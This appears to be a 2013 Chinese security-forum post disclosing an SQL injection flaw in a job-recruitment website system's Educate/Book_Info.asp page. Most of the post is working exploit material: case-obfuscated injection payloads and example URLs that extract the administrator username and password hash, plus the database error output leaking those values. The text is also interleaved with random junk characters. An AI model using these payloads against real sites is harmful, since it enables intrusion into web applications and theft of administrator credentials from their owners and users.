找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2204|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
) U$ Q( E. g" f5 ^5 F ! z3 S2 g5 i2 o0 a
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出+ g7 e# t. b( b! L& ?6 N  N6 ]
0 g- M" C3 i2 ]& T
exp:如下& e! ~- W: I4 s' }
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 r1 Z  t3 `# }+ p查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)$ {6 x2 E, t7 S, D

7 l3 v0 m( d/ R. ^http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
, u3 Z4 F3 x. y7 r5 }  Z ; A5 t. E+ S9 k, C
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
# D) h. C1 u9 G* Z0 X; Z; K0 _
4 `. ~' v' c6 C9 z, m6 z2 Q/ I+ t将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。0 f- b& E$ O$ Y1 ?! K+ z% N' m( u1 c

3 W3 C4 X. ]8 \$ v/Educate/Book_Info.asp,行 8
! `& Q  w; y% B, |- Z& w * k4 a  M2 f* a0 O
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) h0 w, w* f+ a2 x0 |7 C

6 F' U$ |# L9 d: s2 C7 _- d) Y( b- _; AMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'# ]" h/ @+ q' l  d
$ I7 O6 _& A$ _
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。* s6 x1 }# ~1 \* k1 h

) p  k, Y9 t: r* m' V: u/ J/Educate/Book_Info.asp,行 8
; v2 U. p3 T+ G; C& Q$ _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表